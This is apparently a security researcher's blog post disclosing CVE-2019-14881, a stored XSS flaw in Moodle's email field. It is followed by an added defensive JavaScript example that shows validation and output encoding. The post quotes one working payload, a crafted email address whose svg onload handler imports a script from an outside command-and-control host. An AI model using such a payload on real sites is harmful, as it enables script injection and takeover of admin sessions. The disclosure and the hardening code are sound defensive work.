CVE-2019-14881 @ Moodle – Stored XSS on email reflected on various pages

This blog post is about a stored XSS vulnerability which I found in Moodle in September 2019. It was fixed in November 2019 and was assigned CVE-2019-14881. TL;DR: If you specially craft a payload (like “><svg/onload=import(‘https://c2.tadeu.work/a.js’)>”@tadeu.work) and update your email, you can execute JavaScript on certain pages, like “browse users” in the admin area…
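The defensive point behind this class of bug, as an added example (not code from the original post or from Moodle): an address with a quoted local part can pass a syntactic email check and still carry HTML metacharacters, so the value must be encoded where it is written into the page. The function names, the `<td>` markup and the sample address are hypothetical, and the assumption that the stored address reached the HTML unencoded is mine, not the page's.

```javascript
// Added example: hypothetical helpers, not Moodle code.

// Simplified syntactic check that accepts a quoted local part, as RFC 5321
// permits: printable ASCII between the quotes, except a bare '"' or '\'.
function looksLikeEmail(addr) {
  const quotedLocal = /^"(?:[\x20\x21\x23-\x5b\x5d-\x7e]|\\[\x20-\x7e])*"@[A-Za-z0-9.-]+$/;
  const dotAtomLocal = /^[A-Za-z0-9!#$%&'*+\/=?^_`{|}~.-]+@[A-Za-z0-9.-]+$/;
  return quotedLocal.test(addr) || dotAtomLocal.test(addr);
}

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Unsafe: the stored value is concatenated into an attribute and a text node.
function renderUserCellUnsafe(email) {
  return '<td title="' + email + '">' + email + "</td>";
}

// Hardened: same markup, value encoded at output time.
function renderUserCellSafe(email) {
  const encoded = escapeHtml(email);
  return '<td title="' + encoded + '">' + encoded + "</td>";
}

// Constructed sample value: harmless markup inside a quoted local part.
const SAMPLE = '"><b id=marker>x</b>"@example.test';

function demo() {
  return {
    passesValidation: looksLikeEmail(SAMPLE),
    unsafe: renderUserCellUnsafe(SAMPLE),
    safe: renderUserCellSafe(SAMPLE),
  };
}

console.log(demo());
```

Input validation alone does not close the gap here, because the sample is a syntactically acceptable address; the encoding step at render time is what keeps it inert.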